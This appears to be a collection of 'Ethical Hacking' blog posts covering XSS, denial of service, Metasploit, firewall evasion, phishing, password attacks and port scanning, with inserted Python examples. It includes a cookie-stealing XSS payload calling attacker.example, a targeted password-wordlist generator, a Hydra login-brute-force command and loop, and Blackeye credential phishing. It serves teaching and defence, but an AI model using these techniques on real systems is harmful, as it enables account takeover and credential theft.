Ethical Hacking Week 13: Cross Site Scripting

Cross-Site Scripting (XSS) is a type of injection in which malicious scripts are injected into otherwise trusted websites. An XSS attack occurs when an attacker uses a web application to deliver malicious code, generally a browser-side script, to a different end user. The flaws that make XSS possible are widespread: they occur anywhere a web application takes input from a user (a form field, a URL parameter, a request header) and places it in the output it generates without validating it or encoding it for the context where it lands.

An attacker can use XSS to send a malicious script to an unsuspecting user. The user's browser has no way to know that the script should not be trusted and executes it, because from the browser's point of view it came from the site itself. The script therefore runs with the site's origin: it can read cookies and session tokens (unless they are marked HttpOnly), call the site's APIs as the victim, and rewrite the content of the HTML page.

The malicious content sent to the browser is usually a segment of JavaScript, but it may be anything the browser will render or execute, such as HTML or, in older browsers, plugin content like Flash. The variety of attacks built on XSS is almost limitless, but they commonly include sending private data such as cookies or session information to the attacker, redirecting the victim to content controlled by the attacker, or performing other actions on the user's behalf under the guise of the vulnerable site.

How to Determine If You Are Vulnerable

XSS flaws can be difficult to identify and remove from a web application. The most reliable way to find them is a security review of the code, searching for every place where input from an HTTP request can make its way into the HTML output. Note that many different HTML tags and attributes, not only <script>, can be used to carry JavaScript (an onerror handler on an <img> tag, for example). Nessus, Nikto, and other scanners can help find these flaws, but they only scratch the surface: if one part of a website is vulnerable, there is a high likelihood that other places are too.

Types of XSS Attacks

  • Stored XSS attacks (the payload is saved by the application, for example in a comment, and served to every later visitor)
  • Blind cross-site scripting (a stored payload that fires somewhere the attacker cannot see, such as an admin panel, so an out-of-band callback is needed to confirm it)
  • Reflected XSS attacks (the payload is echoed straight back from the request, usually delivered to the victim as a crafted link)
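The following is an added example, not code from the original post: a stored and a reflected XSS scenario side by side with their hardened forms, plus the kind of canary probe a scanner uses to find reflection. The comment store, page templates and the attacker host name attacker.example are all constructed for the example.

```python
import html
import re

# Constructed in-memory comment store standing in for the application's database.
COMMENTS = []


def store_comment(author, body):
    """Persist a comment exactly as submitted (the stored-XSS precondition)."""
    COMMENTS.append({"author": author, "body": body})


def render_comments_unsafe():
    """Vulnerable: user-controlled strings are concatenated straight into the HTML."""
    rows = "".join(f"<li><b>{c['author']}</b>: {c['body']}</li>" for c in COMMENTS)
    return f"<ul>{rows}</ul>"


def render_comments_safe():
    """Hardened: every untrusted value is entity-encoded for the HTML text context."""
    rows = "".join(
        f"<li><b>{html.escape(c['author'])}</b>: {html.escape(c['body'])}</li>"
        for c in COMMENTS
    )
    return f"<ul>{rows}</ul>"


def search_page_unsafe(query):
    """Reflected XSS: a request parameter is echoed back into the page unencoded."""
    return f"<p>Results for: {query}</p>"


def search_page_safe(query):
    """Reflected input encoded for the text context. html.escape(quote=True) also
    encodes ' and " so the same value is safe inside a quoted attribute; a value
    placed inside a <script> block would need JavaScript-string encoding instead."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(page):
    """True if the rendered page still contains a real (un-encoded) <script> tag."""
    return bool(_SCRIPT_TAG.search(page))


def reflects_unencoded(render, canary="xss7Q9z<>\"'"):
    """Scanner-style probe: submit a canary full of HTML metacharacters and report
    whether the page echoes it back byte-for-byte, i.e. without encoding."""
    return canary in render(canary)


if __name__ == "__main__":
    store_comment("alice", "Nice post!")
    # Constructed stored-XSS payload that would ship the session cookie to the attacker.
    store_comment("mallory", "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>")
    print("unsafe:", render_comments_unsafe())
    print("safe:  ", render_comments_safe())
    print("reflected, unsafe:", reflects_unencoded(search_page_unsafe))
    print("reflected, safe:  ", reflects_unencoded(search_page_safe))
```

The encoding is chosen per output context: html.escape is right for text and quoted attributes, but not for a value dropped into a script block or a URL, which is why code review looks at where each piece of input lands, not only whether it is encoded somewhere.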

Ethical Hacking Week 12: Denial Of Service

A DoS attack is an attempt to make a user's or organization's system unavailable, usually by flooding it. There are two main categories: a single attacking system targeting one victim (DoS), and many systems attacking one target at the same time (distributed DoS, or DDoS). The goal is not to gain unauthorized access to machines or data but to prevent legitimate users from using the service. A DoS attack may do the following:
– Flood a network with traffic, thereby preventing legitimate network traffic.
– Disrupt connections between two machines, thereby preventing access to a service.
– Prevent a particular individual from accessing a service.
– Disrupt service to a specific system or person.

A DoS attack is usually a last resort because it is considered unsophisticated: it gives the attacker no information or access, only the disruption of the target's service. A DDoS attack is the same idea on a much larger scale, coordinated across many attacking hosts so that the victim cannot simply block a single source.

DDoS attacks are made up of three roles because they are more complex. The first is the master (or handler), the launcher and mastermind of the attack. The second is the slaves (also called zombies or secondary victims): hosts that have been compromised by and are controlled by the master, and that attack the victim's system on command. The third is the primary victim. The master directs the compromised systems to attack the primary victim's system all at once. A wide-scale attack like this takes a lot of coordination and is done in multiple phases.

In the intrusion phase the attacker compromises weakly secured systems on different networks around the world and installs DDoS agent tools on those slave systems. In the attack phase the slaves are triggered so that they all attack the primary victim at the same time.
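To make the single-source versus distributed distinction concrete, here is an added example (not from the original post) that runs simple flood detection over a constructed access log. The log format, the 10-second window and the two thresholds are assumptions chosen for the sample; a real deployment derives them from baseline traffic.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Window and thresholds are assumptions tuned for the constructed sample below;
# real deployments set them from baseline traffic.
WINDOW_SECONDS = 10
PER_SOURCE_LIMIT = 30   # more than this from one IP per window: single-source flood
TOTAL_LIMIT = 100       # more than this in total, with no dominant source: distributed flood


def parse_line(line):
    """Parse 'YYYY-mm-ddTHH:MM:SS <source-ip> <method> <path>' into (timestamp, ip)."""
    ts, ip, _rest = line.split(" ", 2)
    return datetime.fromisoformat(ts), ip


def window_start(ts, window_seconds=WINDOW_SECONDS):
    """Align a timestamp down to the start of its fixed window within the hour."""
    ts = ts.replace(microsecond=0)
    into_hour = ts.minute * 60 + ts.second
    return ts - timedelta(seconds=into_hour % window_seconds)


def bucket_by_window(lines):
    """Map window start -> Counter of requests per source IP."""
    buckets = defaultdict(Counter)
    for line in lines:
        ts, ip = parse_line(line)
        buckets[window_start(ts)][ip] += 1
    return buckets


def classify_window(counter, per_source_limit=PER_SOURCE_LIMIT, total_limit=TOTAL_LIMIT):
    """('single-source', ip) if one IP alone exceeds the per-source limit;
    ('distributed', n_sources) if the aggregate exceeds the total limit while no
    single source stands out; otherwise ('normal', total)."""
    total = sum(counter.values())
    top_ip, top_count = counter.most_common(1)[0]
    if top_count > per_source_limit:
        return ("single-source", top_ip)
    if total > total_limit:
        return ("distributed", len(counter))
    return ("normal", total)


def detect_floods(lines):
    """Classify every window in the log; returns {window_start: verdict}."""
    return {start: classify_window(c) for start, c in bucket_by_window(lines).items()}


def make_sample_log():
    """Constructed access log: a quiet window, then one host flooding /login,
    then 40 hosts each sending a few requests (none suspicious on its own)."""
    base = datetime(2021, 3, 14, 13, 34, 0)
    lines = []

    def add(offset_s, ip, path):
        lines.append(f"{(base + timedelta(seconds=offset_s)).isoformat()} {ip} GET {path}")

    for i in range(6):                      # window 13:34:00, normal browsing
        add(i, f"198.51.100.{i % 3 + 1}", "/index.html")
    for i in range(60):                     # window 13:34:10, single-source flood
        add(10 + i % 10, "203.0.113.7", "/login")
    for host in range(40):                  # window 13:34:20, distributed flood
        for j in range(4):
            add(20 + 2 * j, f"192.0.2.{host + 1}", "/")
    return lines


if __name__ == "__main__":
    for start, verdict in sorted(detect_floods(make_sample_log()).items()):
        print(start.time(), verdict)
```

The per-source rule catches the first category and is easy to act on (block the address); the aggregate rule is what exposes the second category, where every zombie stays under the per-source threshold and only the total gives the attack away.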

Ethical Hacking Week 11: Metasploit

Metasploit Framework is a Ruby-based penetration testing platform that enables you to write, test, and execute exploit code. It contains a whole toolkit that you can use to test for vulnerabilities, enumerate networks, execute attacks, and evade detection.

One interface Metasploit Framework provides is msfconsole, the most commonly used way to work with the framework. The console lets you run commands, scan targets, and exploit vulnerabilities by combining exploit modules with payloads.

Modules are the core components of the Metasploit Framework. A module is a piece of software that can perform a specific action, such as scanning or exploiting. Each task that you can perform with the Metasploit Framework is defined within a module.

There are specific types of modules in the framework which are used for many different purposes.

  • Exploit – executes a sequence of commands to target a specific vulnerability found in a system or application. Exploit modules include buffer overflow, code injection, and web application exploits.
  • Auxiliary – an auxiliary module does not deliver a payload. It performs arbitrary actions such as scanning, fuzzing, or denial of service.
  • Post-exploitation – a post module lets you gather more information from, or gain further access to, a system you have already exploited. Examples include hash dumps and application and service enumerators.
  • Payload – the code that runs after an exploit successfully compromises a system. The payload defines how you connect back to the shell and what you can do on the target once you have control. A payload can open a Meterpreter session or a plain command shell. Meterpreter is an advanced, in-memory payload that loads extensions (DLLs on Windows) at runtime, so new capabilities can be added to a session without writing files to disk.
  • NOP – a NOP generator produces sequences of do-nothing instructions that you can use to pad buffers; varying them helps bypass standard IDS and IPS signatures for the classic NOP sled.
Ethical Hacking Week 10: Exploits

An exploit is a way of gaining access to a system through a security flaw, taking advantage of a vulnerability. Exploits normally come in the form of a program, a piece of code, or a script. They are often delivered as part of an exploit kit, a packaged collection of exploits.

Exploits vary in what they achieve: some give access to a network or escalate to admin privileges, while others let an attacker booby-trap websites with malware and malicious ads to harvest sensitive information from the site's visitors. There are thousands of exploits for many different targets. Fortunately there is a program for cataloguing vulnerabilities that are documented and disclosed: each gets a unique CVE identifier of the form CVE-YYYY-NNNN, where the year is when the identifier was assigned or the issue was made public, not necessarily when it was discovered.

Blackhole 2.0 was one of the most popular exploit kits for attacking vulnerabilities and security holes in widely used software. Kits like this make it easy for anyone to generate and distribute malware with a high rate of success. On the reconnaissance side, tools such as Nmap or Google dorking are used to find exposed services and security holes to aim an exploit at.

Microsoft is the most common target because of how widespread its software is. The top entry on the most-exploited list the post draws on is CVE-2018-8174, nicknamed Double Kill, a remote code execution flaw in the Windows VBScript engine that can be triggered through Internet Explorer.

Ethical Hacking Week 9: Firewalls

A firewall controls which hosts may reach which ports: it blocks traffic to ports that should not be exposed and restricts the rest to permitted sources. Some firewalls provide stateful packet inspection, which means they check the addresses and ports inside the IP and TCP or UDP headers and track connection state, so that only packets belonging to an established or explicitly permitted connection are accepted. Firewalls are meant for protection and detection: most scans that are not stealthy will be logged and can raise an alert to the hosts and admins.

A standard network firewall in front of a website usually only allows HTTP and HTTPS through and blocks all other traffic; it does not look inside the HTTP requests themselves. Firewalls that work at the application layer of the OSI model are different. These proxy firewalls (and web application firewalls) terminate the connection, inspect the actual request data, and forward only what passes their filters. They are typically deployed as a reverse proxy in front of the web servers, in a separate network segment rather than inside the internal network, so that outside connections never reach the internal network directly.

One way to get through a firewall is packet fragmentation. Networks have a maximum size for a datagram, the MTU (usually 1500 bytes on Ethernet). Fragmenting splits a packet into pieces that are reassembled by the receiver. A simple packet filter that examines only the first fragment, or does not reassemble fragments at all, can be made to pass a fragment set whose reassembled form it would have blocked.

UDP and ICMP fragmentation attacks – the attacker sends bogus fragmented UDP or ICMP packets whose total size exceeds the network's MTU. Because the fragment sets are incomplete or malformed and can never be reassembled, the target holds them in its reassembly buffers until they time out; at a high enough rate its resources are consumed and the server becomes unavailable.

TCP fragmentation attacks (a.k.a. Teardrop) – these target the TCP/IP reassembly code by sending fragments whose offsets overlap, so they cannot be put back together correctly. A reassembler that does not handle the overlap safely crashes or hangs, taking the victim's server down. Teardrop originally exploited a vulnerability in older versions of Windows, including 3.1, 95 and NT. Patches were thought to have put a stop to it, but a related reassembly flaw resurfaced in Windows Vista and Windows 7, making Teardrop-style attacks a viable vector again.
That flaw was patched in turn, but operators should keep an eye out to ensure that it stays patched in all future versions.
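As an added example (not code from the original post), here is a small IPv4 fragment reassembler that rejects the malformed sets described above instead of trusting the offsets: overlapping fragments (Teardrop), gaps, a set whose reassembled size would exceed the 65535-byte IP limit, and inconsistent more-fragments flags. The fragment builder and the addresses 10.0.0.1 and 10.0.0.2 are constructed test input; the checksum is left at zero because nothing here validates it.

```python
import struct

IPV4_HDR = "!BBHHHBBH4s4s"   # version/IHL, TOS, total length, id, flags+offset, TTL, proto, checksum, src, dst
MAX_PAYLOAD = 65535 - 20     # largest reassembled payload the 16-bit total-length field allows


def _ip(addr):
    return bytes(int(octet) for octet in addr.split("."))


def build_fragment(ident, offset, more_fragments, payload, src="10.0.0.1", dst="10.0.0.2", proto=17):
    """Build one IPv4 fragment (20-byte header, no options, checksum left zero).
    Constructed test input only; offset is in bytes and must be a multiple of 8."""
    if offset % 8:
        raise ValueError("fragment offset must be a multiple of 8 bytes")
    flags_frag = ((1 if more_fragments else 0) << 13) | (offset // 8)
    header = struct.pack(IPV4_HDR, (4 << 4) | 5, 0, 20 + len(payload), ident,
                         flags_frag, 64, proto, 0, _ip(src), _ip(dst))
    return header + payload


def parse_fragment(packet):
    """Pull id, more-fragments flag, byte offset and payload out of an IPv4 packet."""
    (ver_ihl, _tos, total_len, ident, flags_frag,
     _ttl, _proto, _csum, _src, _dst) = struct.unpack(IPV4_HDR, packet[:20])
    ihl = (ver_ihl & 0x0F) * 4
    return {
        "id": ident,
        "mf": bool(flags_frag & 0x2000),
        "offset": (flags_frag & 0x1FFF) * 8,
        "payload": packet[ihl:total_len],
    }


class ReassemblyError(Exception):
    pass


def reassemble(packets):
    """Reassemble one datagram, refusing the malformed fragment sets the text describes:
    overlapping offsets (Teardrop), gaps, oversize totals, and inconsistent MF flags."""
    frags = sorted((parse_fragment(p) for p in packets), key=lambda f: f["offset"])
    if len({f["id"] for f in frags}) != 1:
        raise ReassemblyError("fragments belong to different datagrams")
    data = bytearray()
    next_offset = 0
    for i, f in enumerate(frags):
        is_last = i == len(frags) - 1
        start, end = f["offset"], f["offset"] + len(f["payload"])
        if is_last and f["mf"]:
            raise ReassemblyError("final fragment missing: last fragment still has MF set")
        if not is_last and not f["mf"]:
            raise ReassemblyError("fragment without MF is followed by more fragments")
        if f["mf"] and len(f["payload"]) % 8:
            raise ReassemblyError("non-final fragment payload is not a multiple of 8 bytes")
        if start < next_offset:
            raise ReassemblyError(f"fragment at offset {start} overlaps previous data (Teardrop-style)")
        if start > next_offset:
            raise ReassemblyError(f"gap before offset {start}: a fragment is missing")
        if end > MAX_PAYLOAD:
            raise ReassemblyError(f"reassembled datagram would be {end + 20} bytes, over the 65535 limit")
        data += f["payload"]
        next_offset = end
    return bytes(data)


def try_reassemble(packets):
    """(True, payload) on success, (False, reason) when the set is rejected."""
    try:
        return True, reassemble(packets)
    except ReassemblyError as exc:
        return False, str(exc)


if __name__ == "__main__":
    good = [build_fragment(1, 0, True, b"A" * 16), build_fragment(1, 16, True, b"B" * 16),
            build_fragment(1, 32, False, b"C" * 5)]
    teardrop = [build_fragment(2, 0, True, b"A" * 24), build_fragment(2, 8, False, b"B" * 8)]
    print(try_reassemble(good))
    print(try_reassemble(teardrop))
```

The same checks are what a stateful firewall has to perform if it reassembles before filtering; a filter that inspects fragments one at a time without them is exactly the one that can be talked past.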

Other ways to bypass a firewall include:

  • Firewalking (using TTL-limited probes, as traceroute does, to map which ports the firewall lets through)
  • Source routing (specifying the packet's path in IP options to steer it around the filter; modern routers almost always drop such packets)
  • HTTP tunneling (wrapping other protocols inside HTTP, which the firewall allows through)
  • ICMP tunneling (carrying data in the payload of ICMP echo packets)
Ethical Hacking Week 8: Social Engineering

Social engineering is a way of using human psychology against an individual, taking advantage of their trust. What sets it apart from the other avenues of attack is that it relies on communication with people rather than between devices. Social engineering methods include:

  • Impersonation
  • Reciprocation
  • Influential authority
  • Scarcity
  • Social relationship
  • Social Engineering Toolkit (SET, a framework that automates many of these attacks rather than a method in itself)

Impersonation seems to be the most commonly used form of social engineering: someone creates a fake social media account or email address to persuade the target that they are someone they are not. If the victim falls for it, they become susceptible to the phishing attacks covered in the previous post. Fake links, emails, and fake offers paired with impersonation can yield the victim's IP address, login credentials, and even banking information.

Social relationship can also be used to gain a victim's trust and persuade them to reveal sensitive information without any technical hacking at all.

A tool often paired with social engineering is CUPP (Common User Passwords Profiler), which generates a password list from what is known about the target: names, nicknames, birthdays, pets, partner, company, and so on. Some information about the target is needed for it to work, but the result can be a powerful wordlist to use with Hydra or any other dictionary-attack tool.
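As an added example, not CUPP's own code, here is a CUPP-style profiler: it takes a target profile and expands it into candidate passwords with case variants, leetspeak, date fragments, year suffixes and two-word combinations. The profile fields, the substitution table and the length limits are assumptions; the target "Alice Smith" is made up.

```python
import itertools

LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})


def date_fragments(birthdate):
    """'1994-07-23' -> year, 2-digit year, DDMM, MMDD, day, month."""
    year, month, day = birthdate.split("-")
    return [year, year[2:], day + month, month + day, day, month]


def word_variants(word):
    """Case and leetspeak variants of a single profile word."""
    word = word.lower()
    leet = word.translate(LEET)
    return {word, word.capitalize(), word.upper(), leet, leet.capitalize()}


def generate_wordlist(profile, extra_years=(), min_len=6, max_len=16):
    """CUPP-style candidate passwords built from a target profile (a dict of strings):
    single words, word+fragment, fragment+word, and two-word combinations."""
    words = {v for k, v in profile.items() if k != "birthdate" and v}
    fragments = set(date_fragments(profile["birthdate"])) if profile.get("birthdate") else set()
    suffixes = fragments | {str(y) for y in extra_years} | {"1", "123", "!", "!1"}
    candidates = set()
    for word in words:
        for variant in word_variants(word):
            candidates.add(variant)
            for s in suffixes:
                candidates.add(variant + s)
                candidates.add(s + variant)
    for a, b in itertools.permutations(sorted(words), 2):
        a, b = a.lower(), b.lower()
        candidates.update({a + b, a.capitalize() + b.capitalize(), a + "_" + b})
    # Drop candidates outside the target's likely password policy (assumed 6..16 chars).
    return sorted(c for c in candidates if min_len <= len(c) <= max_len)


if __name__ == "__main__":
    # Constructed target profile; every field is made up.
    target = {"first": "Alice", "last": "Smith", "pet": "Rex", "partner": "Bob", "birthdate": "1994-07-23"}
    wordlist = generate_wordlist(target, extra_years=(2020, 2021))
    print(len(wordlist), "candidates, e.g.", wordlist[:8])
    # Typical next step: write the list to a file and pass it to Hydra with -P.
```

The length filter matters: applying the site's known password policy (minimum length, required digit or symbol) before the attack removes candidates that can never succeed and keeps the attempt count, and therefore the lockout risk, down.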

Ethical Hacking Week 7: Phishing

Phishing is a cybercrime in which targets are contacted by email, telephone or text message by someone posing as a legitimate institution, to lure them into providing sensitive data such as personally identifiable information, banking and credit card details, and passwords.

The information is then used to access important accounts and can result in identity theft and financial loss. These are common attributes of a phishing message.

1. Too Good To Be True – Lucrative offers and eye-catching or attention-grabbing statements are designed to attract people's attention immediately. For instance, many claim that you have won an iPhone, a lottery, or some other lavish prize. Don't click on suspicious emails. Remember that if it seems too good to be true, it probably is.
2. Sense of Urgency – A favorite tactic among cybercriminals is to ask you to act fast because the super deals are only for a limited time. Some will even tell you that you have only a few minutes to respond. When you come across these kinds of emails, it's best to just ignore them. Sometimes they will tell you that your account will be suspended unless you update your personal details immediately. Most reliable organizations give ample time before they terminate an account, and they do not ask you to enter personal details through a link in an email. When in doubt, go to the site directly rather than clicking a link in the message.
3. Hyperlinks – A link may not be all it appears to be. Hovering over a link shows you the actual URL you will be sent to when you click it. It could be completely different from the text, or it could be a popular website with a misspelling, for instance www.bankofarnerica.com: the 'm' is actually an 'r' followed by an 'n', so look carefully.
4. Attachments – If you see an attachment in an email you weren't expecting or that doesn't make sense, don't open it. Attachments often carry payloads such as ransomware or other malware. No file type is guaranteed safe: Office documents carry macros, PDFs and HTML files can carry scripts, and archives or ISO images can hide executables. A plain .txt file opened in a text editor is about the lowest-risk attachment, but check the full file name, since invoice.txt.exe is an executable.
5. Unusual Sender – Whether it looks like it's from someone you don't know or someone you do know, if anything seems out of the ordinary, unexpected, out of character or just suspicious in general, don't click on it.
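The hyperlink check in point 3 is mechanical enough to automate. The following is an added example, not from the original post: for each link it compares the domain shown in the visible text with the domain the href really goes to, flags raw IP targets, and compares the target against a small assumed allow-list of brands using a homoglyph table (the rn-for-m trick above) plus edit distance for plain typosquats. The trusted domains, the homoglyph table and the sample anchors are all constructed for the example.

```python
import re
from urllib.parse import urlparse

# Assumed allow-list of brands the organisation cares about; extend to taste.
TRUSTED_DOMAINS = ["bankofamerica.com", "paypal.com", "microsoft.com"]

# Character sequences that look alike in common fonts, mapped to what they imitate.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]

_DOMAIN_IN_TEXT = re.compile(r"(?:https?://)?(?:www\.)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})", re.I)
_IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def normalize(domain):
    """Replace look-alike sequences so 'bankofarnerica' collapses to 'bankofamerica'."""
    d = domain.lower()
    for fake, real in HOMOGLYPHS:
        d = d.replace(fake, real)
    return d


def registrable(host):
    """Last two labels of a hostname (assumption: ignores multi-part suffixes such as co.uk)."""
    return ".".join(host.lower().split(".")[-2:])


def levenshtein(a, b):
    """Edit distance; a small value against a trusted name indicates a typosquat."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess_link(visible_text, href):
    """Findings for one hyperlink: the text the user sees versus where it really goes."""
    findings = []
    host = (urlparse(href).hostname or "").lower()
    target = registrable(host)
    shown = _DOMAIN_IN_TEXT.search(visible_text)
    if shown and registrable(shown.group(1)) != target:
        findings.append(f"visible text says {registrable(shown.group(1))} but link goes to {target}")
    if _IPV4.fullmatch(host):
        findings.append("link target is a raw IP address")
    for trusted in TRUSTED_DOMAINS:
        if target == trusted:
            continue
        if normalize(target) == trusted:
            findings.append(f"homoglyph lookalike of {trusted}")
        elif levenshtein(target, trusted) <= 2:
            findings.append(f"typosquat of {trusted}")
    return findings


if __name__ == "__main__":
    # Constructed anchors as they might appear in a phishing email.
    for text, href in [("www.bankofamerica.com", "http://www.bankofarnerica.com/login"),
                       ("Sign in", "https://www.paypal.com/signin"),
                       ("click here", "http://203.0.113.9/verify")]:
        print(href, "->", assess_link(text, href) or ["no findings"])
```

A production filter would replace the two-label registrable() shortcut with the public suffix list and extend the homoglyph table to Unicode confusables, but the structure is the same: decide what the user thinks they are clicking, decide where the click actually goes, and alert on the difference.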

Blackeye Phishing Tool

There is a tool that makes this process very easy. Blackeye bills itself as "the ultimate phishing tool": it generates a cloned login page and the phishing link for you. Paired with ngrok, which exposes a local server behind NAT and firewalls to the public internet over a secure tunnel, that page can be reached by a target anywhere.

Blackeye gives you a whole lot of sites to choose from, including Facebook, Snapchat, Twitter, and others. When someone clicks the link they are taken to a very realistic copy of the site with a login form. If the user submits their login credentials, they are printed to your terminal along with the victim's IP address.

A phishing tool like this becomes extremely powerful when combined with the social engineering skills that will be covered in the next post.

Ethical Hacking Week 6: Hydra and Dictionary Attacks

Once enumeration is done, the ethical hacker can move on to obtaining the admins' credentials. There are many ways to get a password: dictionary attacks, phishing, SQL injection, eavesdropping, malware and plenty more. Today we focus on a dictionary attack using Hydra.

A dictionary attack is a form of brute-force attack against an authentication mechanism that tries thousands or millions of likely username and password combinations. The candidate lists are often taken from previous data breaches, so the entries are realistic rather than random. The method works only because people choose short, weak, or reused passwords. Nowadays your browser and your phone have provided features to generate safe passwords and store them to make sure

CeWL – a Ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words that can then be fed to password crackers such as John the Ripper or Hydra. In other words, you can build a personalized dictionary from a target's own website.

Hydra – a parallelized network login cracker that ships with Kali Linux, Parrot, and other major penetration-testing distributions. It supports many protocols (HTTP forms, SSH, FTP, SMB and more) and works through the username and password combinations you give it until it finds one the service accepts.

Implementation – Once you have generated a list of passwords with CeWL, or from whatever source you choose, you can run Hydra. A username (or a list of them) is also needed; it is usually much easier to obtain than the password, since usernames are often visible to outsiders or are simply the user's email address, and they can be collected in the enumeration steps we covered previously.

hydra example.com -L emails.txt -P passwords.txt http-post-form "/login.php:email=^USER^&password=^PASS^:Invalid password"

example.com is the target host you give to Hydra. The -L flag takes the file of usernames (here a list of emails) and the -P flag takes the file of passwords. http-post-form selects the module that submits each pair as an HTTP POST. Its argument has three colon-separated parts: the path the form posts to (/login.php); the POST body, in which ^USER^ and ^PASS^ are placeholders that Hydra fills in from the two lists; and finally the failure string, "Invalid password". Hydra looks for that string in each response, and a response that does not contain it is reported as a valid login. Choose the string carefully: if the application returns a different message after an account lockout or a CAPTCHA, every later attempt will look like a success. Hydra also accepts S=<string> in that position to match on a success message instead.

If done correctly, Hydra will perform the dictionary attack and attempt to log in with every combination of the two lists.
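To show what the http-post-form module does under the hood, and why the failure string matters, here is an added example that is not Hydra's code: a dictionary attack loop in Python against a constructed in-process stand-in for /login.php. The account admin@example.com, its password, the lockout threshold and the page messages are all made up for the example; the loop itself uses Hydra's ^USER^/^PASS^ placeholder syntax and both of its match conditions.

```python
import itertools
from urllib.parse import parse_qs, quote_plus

# Constructed stand-in for the target's /login.php so the example runs offline.
VALID_ACCOUNTS = {"admin@example.com": "Summer2021!"}   # made-up credential
LOCKOUT_AFTER = 5                                      # failed attempts before the account locks
_failures = {}


def reset_target():
    _failures.clear()


def mock_login(body):
    """Takes a urlencoded POST body, returns the HTML the real login page would."""
    form = {k: v[0] for k, v in parse_qs(body).items()}
    user, password = form.get("email", ""), form.get("password", "")
    if _failures.get(user, 0) >= LOCKOUT_AFTER:
        return "<p>Account locked. Contact support.</p>"
    if VALID_ACCOUNTS.get(user) == password:
        return "<p>Welcome back</p><a href='/logout'>Logout</a>"
    _failures[user] = _failures.get(user, 0) + 1
    return "<p>Invalid password</p>"


FORM_TEMPLATE = "email=^USER^&password=^PASS^"   # same placeholder syntax Hydra uses


def fill_template(template, user, password):
    """Substitute the ^USER^/^PASS^ placeholders, URL-encoding the values."""
    return template.replace("^USER^", quote_plus(user)).replace("^PASS^", quote_plus(password))


def dictionary_attack(submit, users, passwords, template=FORM_TEMPLATE,
                      fail_marker=None, success_marker=None):
    """Try every user/password pair. With fail_marker, a response that lacks the
    marker counts as success (Hydra's default F= condition); with success_marker,
    only a response containing it does (Hydra's S= condition)."""
    if (fail_marker is None) == (success_marker is None):
        raise ValueError("give exactly one of fail_marker or success_marker")
    hits = []
    for user, password in itertools.product(users, passwords):
        body = submit(fill_template(template, user, password))
        ok = (success_marker in body) if success_marker is not None else (fail_marker not in body)
        if ok:
            hits.append((user, password))
    return hits


if __name__ == "__main__":
    users = ["admin@example.com"]
    short_list = ["password", "123456", "Summer2021!"]
    reset_target()
    print("short list, F=:", dictionary_attack(mock_login, users, short_list, fail_marker="Invalid password"))
    long_list = ["a", "b", "c", "d", "e", "f", "Summer2021!"]
    reset_target()
    print("long list, F= (false positives after lockout):",
          dictionary_attack(mock_login, users, long_list, fail_marker="Invalid password"))
    reset_target()
    print("long list, S=:", dictionary_attack(mock_login, users, long_list, success_marker="Logout"))
```

The second run is the trap: once the account locks, the "Invalid password" text disappears, so a failure-string match reports every remaining guess as a hit, including the real password that the server never actually accepted. Matching on a success marker avoids the false positives, and checking for lockout behaviour before running the full list avoids locking the account you are testing.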

Ethical Hacking Week 5: Port Scanning

Port scanning can be done with many tools; today we look at Nmap (Network Mapper), a free and open-source tool for network discovery and security auditing. It is commonly used to discover which hosts on a network are up and what devices they are, and along with host information it shows which services they offer. It finds open ports and can point out security risks. Nmap also offers ping scans and operating system detection, and it has kept evolving over the years.

Nmap works by sending crafted packets over TCP, UDP, SCTP, and ICMP and interpreting the replies. It can also grab banners (with -sV and its scripting engine) to learn which software, and which version, is listening on each open port. Systems protect themselves by closing ports they do not need and by filtering: a firewall in front of the host drops or rejects the probe so it never reaches the service, and Nmap reports such ports as filtered rather than open or closed.

TCP Message Types – These are the flags you will see when watching a TCP connection being set up (the three-way handshake) and torn down.

  • SYN – initiates and establishes the connection, and synchronizes sequence numbers between the two hosts.
  • ACK – confirms to the other host that its packet (the SYN, or later data) has been received.
  • SYN-ACK – the server's SYN and its ACK of the client's SYN combined in one message.
  • RST – aborts the connection; a closed port answers a SYN with RST, which is how a scanner tells closed from open.
  • FIN – terminates the connection.

Examples of Port Scanning with Nmap

proxychains only intercepts TCP connect() calls, so anything routed through it must be a connect scan (-sT) with host discovery disabled (-Pn); a raw-packet SYN scan or an ICMP ping bypasses the proxy and reveals your real address. The ping scan below is therefore run directly, not through the proxy.

Ping Scan

$ nmap -sn 40.90.170.115/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-14 13:34 EDT
Nmap done: 256 IP addresses (33 hosts up) scanned in 7.30 seconds

Port Scan

$ proxychains nmap -sT -Pn 40.90.170.141 -p1-65535
Not shown: 65534 filtered ports
PORT    STATE SERVICE
443/tcp open  https

Service/Version Scan

$ proxychains nmap -sT -Pn -sV 40.90.170.141
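As an added example (not from the original post, and not Nmap's code), here is the connect-scan logic that nmap -sT performs, written in Python against a constructed local target: a listener on 127.0.0.1 that answers with a made-up SSH-style banner, plus a deliberately closed port, so the open/closed/filtered distinction and banner grabbing can be seen without touching a real network.

```python
import socket
import threading


def start_listener(banner=b"SSH-2.0-ExampleBanner\r\n"):
    """Constructed target: a TCP service on 127.0.0.1 at an ephemeral port that
    greets each client with a banner, then hangs up. Returns (server_socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:       # server socket closed: stop serving
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def find_closed_port():
    """Bind an ephemeral port and release it immediately so nothing is listening there."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def probe(host, port, timeout=1.0):
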